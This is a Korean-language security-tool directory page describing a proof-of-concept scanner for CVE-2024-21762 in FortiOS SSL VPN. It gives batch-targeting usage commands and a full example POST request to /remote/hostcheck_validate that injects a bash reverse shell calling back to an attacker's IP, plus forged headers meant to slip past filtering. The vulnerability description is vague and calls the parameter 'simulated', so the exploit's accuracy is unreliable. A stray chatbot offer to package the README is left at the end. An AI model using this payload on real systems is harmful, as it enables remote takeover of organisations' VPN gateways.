Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-21762_FortiNet_PoC — 개념 증명 스캐너로 FortiOS SSL VPN의 `/remote/hostcheck_validate` 엔드포인트에서 CVE-2024-21762를 대상으로 하며 리버스 셸 페이로드 전달을 포함합니다. | Kitploit
도구/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

개념 증명 스캐너로 FortiOS SSL VPN의 `/remote/hostcheck_validate` 엔드포인트에서 CVE-2024-21762를 대상으로 하며 리버스 셸 페이로드 전달을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
211년 전아직 검토되지 않음

CVE-2024-21762_FortiNet_PoC

CVE-2024-21762를 대상으로 하는 개념 증명 스캐너로, FortiOS SSL VPN의 /remote/hostcheck_validate 엔드포인트를 겨냥하며 리버스 셸 페이로드를 전달합니다.

다음은 프로젝트에 대한 GitHub 스타일의 요약으로, 깔끔하고 간결한 설명, 사용법 안내, CVE와의 연관성에 대한 맥락을 포함합니다.


🔥 프로젝트 제목: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 요약 (GitHub 설명란용):

CVE-2024-21762를 대상으로 하는 개념 증명 스캐너로, FortiOS SSL VPN의 /remote/hostcheck_validate 엔드포인트를 겨냥하며 리버스 셸 페이로드를 전달합니다.


📜 개요

이 Python 스크립트는 Fortinet의 FortiOS SSL VPN 인터페이스와 상호작용하도록 설계된 PoC(Proof of Concept) 도구로, /remote/hostcheck_validate 엔드포인트의 스택 기반 버퍼 오버플로우 또는 명령 주입 취약점인 CVE-2024-21762를 대상으로 합니다.

면책 조항: 이 도구는 교육 및 승인된 테스트 목적으로만 사용해야 합니다.


🧬 작동 방식

  • FortiGate SSL VPN 인터페이스의 /remote/hostcheck_validate에 조작된 POST 요청을 전송합니다.
  • 시뮬레이션된 취약 파라미터(host)에 bash 리버스 셸 페이로드를 주입합니다.
  • 위조된 헤더(User-Agent, Cookie)를 사용하여 표면적인 FortiOS 요청 필터링을 우회합니다.
  • 서버 응답을 수신 및 기록하여 익스플로잇 성공 여부를 평가합니다.
  • 파일 입출력 자동화 및 진행 막대를 통해 단일 또는 배치 대상 테스트를 지원합니다.

🛠️ 기능

  • 🧪 제어된 양식 필드를 통한 리버스 셸 페이로드 주입
  • 🧾 분석을 위한 전체 HTTP 응답 캡처 (last_response.txt)
  • 📊 단일/배치 모드 추적을 위한 진행 막대
  • 🗃️ 입력/출력 파일 지원 배치 모드
  • 🔄 모듈식 및 확장 가능

⚙️ 요구 사항

  • Python 3.6+
  • 진행 상황 시각화를 위한 tqdm

의존성 설치:

root@kitploit:~
pip install tqdm

🚀 사용법

단일 대상 모드

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

배치 모드

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: IP:PORT 형식의 대상 목록, 한 줄에 하나씩
  • results.txt: 익스플로잇 시도 출력 로그

📥 전송된 예시 페이로드

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 로그

도구는 각 시도의 전체 HTTP 응답을 다음 파일에 기록합니다:

root@kitploit:~
last_response.txt

이 파일을 사용하여 요청이 구문 분석되었는지, 거부되었는지, 또는 오류 코드가 반환되었는지 확인할 수 있습니다.


⚠️ 법적 고지

이 코드는 교육 및 승인된 테스트 목적으로만 제공됩니다. 소유하거나 명시적 테스트 권한이 없는 네트워크나 시스템에서는 사용하지 마십시오.


✍️ 저자

Carter — 사이버보안 엔지니어, Red/Purple Team 애호가, PoC 자동화 괴짜.


이 내용을 GitHub에 푸시할 준비가 된 README.md 파일 + 저장소 구조로 패키징하시겠습니까? 다음에 생성해 드릴 수 있습니다.

도구 다운로드